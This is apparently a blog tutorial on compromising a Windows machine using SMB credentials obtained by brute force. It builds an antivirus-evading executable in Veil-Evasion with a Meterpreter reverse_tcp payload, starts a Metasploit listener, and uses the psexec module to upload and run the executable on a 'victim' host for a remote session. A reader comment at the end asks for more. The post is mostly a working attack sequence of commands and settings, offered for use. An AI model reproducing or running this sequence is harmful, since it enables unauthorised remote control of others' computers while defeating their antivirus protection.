Last post explained about how to find windows share (SMB) credentials using brute-forcing method.
Today’s tutorial we going to upload and execute the undetectable payload to the victims machine using SMB credentials gotten from brute-force method.
For that i am going to use Microsoft windows authenticated user code execution.
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
Psexec utility is a command line tool allowing the execution of processes on a remote system and transfer the results of operations to the local console. It has a long list of optional parameters that allow a great deal of flexibility for IT administrators. The key feature of PsExec is to allow users to run a script or application within the security context of either the currently logged on user or as a user provided during program initialization.
For that we need Veil-Evasion tool to generate payloads executables that bypass antivirus. For installing Veil-Evasion tool follow by previous post Evading-Antivirus.
After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.
#./Veil-Evasion.py
After executing Veil-Evasion.py python script. The Veil window will appear. You see that today it has 31 payloads:
You can obtain a list of all the payloads with the “list” command:
[>] Please enter a command: list
[>] Please enter a command: use 27
[>] Please enter a command: set use_pyherion Y
PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.
I am going to use the python/b64_substitution payload, so I type “use 27” and press Enter. It loads that component, as shown below:
[>] Please enter a command: generate
After giving generate command, Then it’s necessary to wait while the shellcode is been generated.
Now we are going to select msfvenom typing “1”
[>] Please enter the number of your choice : 1
After that we need to type some details:
Enter metasploit payload: “windows/meterpreter/reverse_tcp”
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “8080”
You need to press enter and then Veil requests us the name of our payload. We are going to use Pyinstaller. It will create a setup1.exe installable. For this, we are going to type “1”.
[>] Please enter the number of your choice : 1
Next, I issue the “generate” command and press enter to create the executable.
we need to set our metaspoit to listen for meterperter reverse tcp connection in port 8080
#msfconsole
#msf > use exploit/multi/handler
#msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
#msf exploit(handler) > set LHOST 192.168.31.20
#msf exploit(handler) > set LPORT 8080
#msf exploit(handler) > exploit -j
#msf exploit(handler) > jobs
It will the show our current job of reverse_tcp handler, now we going to use the psexec exploit in msfconsole.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.31.2
msf exploit(psexec) > set SMBPass bhuvi
msf exploit(psexec) > set SMBUser sathish
msf exploit(psexec) > set EXE::Custom /root/veil-output/compiled/setup1.exe
msf exploit(psexec) > set DisablePayloadHandler true
msf exploit(psexec) > exploit
After entering the credetials and setting the path of undetectable executable in EXE:Custom, when the victim connects the custom exe will be uploaded and executed on the victims machine gave as meterperter session to operate.
And our AV still not find any suspicious activity but its may vary for other AV vendors.
Hi Sathish! Thanks to you for this wonderful site and your work. I’m a fan of your site and if possible please write more articles. 🙂 Can you please tell me the sequence using Veli-Catapult and Veil-Evasion, I, somehow, confused. ))) Thanks advanced !